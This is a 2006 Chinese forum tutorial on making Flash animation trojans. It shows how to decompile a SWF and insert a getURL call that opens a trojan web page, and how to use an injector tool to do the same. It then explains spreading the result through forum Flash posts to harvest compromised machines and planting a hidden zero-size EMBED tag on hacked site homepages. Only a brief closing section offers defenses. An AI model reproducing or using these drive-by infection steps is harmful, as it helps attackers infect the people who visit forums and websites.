廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 2640 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[資訊教學] Flash木馬是這樣練成的
在網站上觀看Flash動畫,接收到“好友”發來的一張Flash賀卡,甚至於一個QQ魔法表情,一不留神就中了一個木馬!Flash動畫木馬可以說是無處不在,攻擊威力和覆蓋面極其廣。許多朋友一定想了解Flash木馬的原理,想知道攻擊者是如 何在SWF中插入木馬的呢?我們應該怎么樣來防範Flash木馬呢?
一、製作Flash動畫木馬的準備
Flash動畫木馬的原理,是在網頁中顯示或本地直接播放Flash動畫木馬時,讓Flash自動打開一個網址,而該網址就是我們預先製作好的一個木馬網頁。也就是說,在製作網頁木馬前,我們首先需要製作好一個網頁木馬,並將它放置到某個網站上去。關於網頁木馬的具體製作方法,不是今天要講的內容,大家可參考以前的《網友世界》雜誌。
另外,我們還需要準備一個比較吸引人的Flash動畫文件“MM熱舞.swf”,以及Flash動畫反編譯工具“閃客精靈”,編輯工具Macromedia Flash MX。
二、最原始的Flash木馬
現在雖然有了許多各種各樣的Flash動畫木馬製作工具,但是為了了解Flash動畫木馬的最基本原理,有必要從頭開始用最原始的方法製作一個Flash木馬。
步驟一:反編譯SWF動畫
首先我們需要將要插入網頁木馬的Flash動畫文件“MM熱舞.swf”,反編譯成可編輯的.fla格式。運行“閃客精靈”,點擊功能表“文件”→“快速打開”命令,指定“MM熱舞.swf”文件將其導入。然後點擊工具欄上的“導出FLA”命令,將動畫導出為“MM熱舞.fla”文件(如圖1)。

圖1
步驟二:插入網頁木馬代碼
然後運行Flash動畫編輯器Macromedia Flash MX,點擊功能表“文件”→“打開”,調入剛才保存的fla文件。展開介面下方的“動作/幀”欄,再展開“動作”→“瀏覽器/網路”項,點擊其中的“getURL”命令,在右邊窗口中的“URL”裏面輸入我們的網頁木馬地址;窗口方式為“_blank”;“變數”設置為“使用GET方式發送”,在下方的代碼窗口中將出現“getURL("http://網頁木馬地址", "_blank", "GET");”(如圖2)。

圖2
步驟三:生成Flash木馬
設置完畢後保存文件,並點擊功能表“文件”→“發佈”命令,將動畫重新導出為SWF格式。用IE瀏覽器打開剛才生成的Flash動畫木馬,可以看到隨著Flash動畫打開播放時,自動彈出一個瀏覽器窗口,裏面將會顯示我們的木馬網頁。
三、簡簡單單生成Flash木馬
上面插入木馬的過程比較麻煩,下面我們介紹一個簡單的方法,也正是這些簡單的工具使得Flash木馬在網上隨處可見。


運行SWF木馬插入器,點擊介面中的“選擇”按鈕,瀏覽指定要插入木馬的SWF文件;在“插入代碼”中輸入木馬網頁的地址;切記不要勾選下面的“只解壓”項。設置完畢後,點擊“給我插”按鈕,程式提示開始插入木馬網頁(如圖3)。顯示成功資訊後,關閉程式,用IE打開生成的動畫,可以看到自動跳轉到木馬網頁去了。

圖3
四、Flash木馬的利用
看到上面的步驟了吧,生成一個Flash動畫木馬是不是很簡單?那么生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中,就可以透過論壇或網站之類的直接利用了。
大部分的論壇中都可以發來Flash動畫的帖子,利用論壇發帖,攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例,在發帖或回復時,點擊編輯窗口上方的“插入Flash動畫”按鈕,設置Flash窗口大小,使用默認設置後,要求輸入Flash的URL地址(如圖4)。確定後,可以看到編輯窗口中顯示的代碼為“”(如圖5),這就是完整的Flash播放代碼了,不同的論壇代碼是不一樣的。

圖4

圖5
應用二:網頁嵌入Flash木馬
攻擊者入侵了某個大的網站之後,很可能在網站首頁挂馬,使用普通方式挂馬會被管理員發覺,但是挂上Flash木馬的話,是很難查殺的。攻擊者可能在網頁中插入如下代碼:
“《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改為<>。
這裏的參數“width=0 height=0”表示,Flash播放窗口為零,也就是不顯示Flash播放窗口。其他用戶瀏覽網頁時,就會莫名其妙的彈出一個木馬網頁窗口。
五、關於Flash木馬的防範
其實不管Flash木馬有多么的巧妙,最終都是要跳轉到木馬網頁去的,也就是說我們最終要防範的還是網頁木馬。了解了思路,對於Flash動畫木馬就簡單了:
首先,要開啟Windows XP SP2的窗口攔截窗口功能,或安裝其他防彈出窗口的插件。如果那個漏網之魚,莫名其妙彈出的網頁窗口要及時的關閉。另外,一定要在上網瀏覽時開啟殺毒軟體的網頁監控功能,只要網頁木馬在後臺一下載到本地硬碟,就會被殺毒軟體查殺,這樣就萬事無憂了!



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:臺灣 | Posted:2006-12-14 20:56 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.075335 second(s),query:15 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言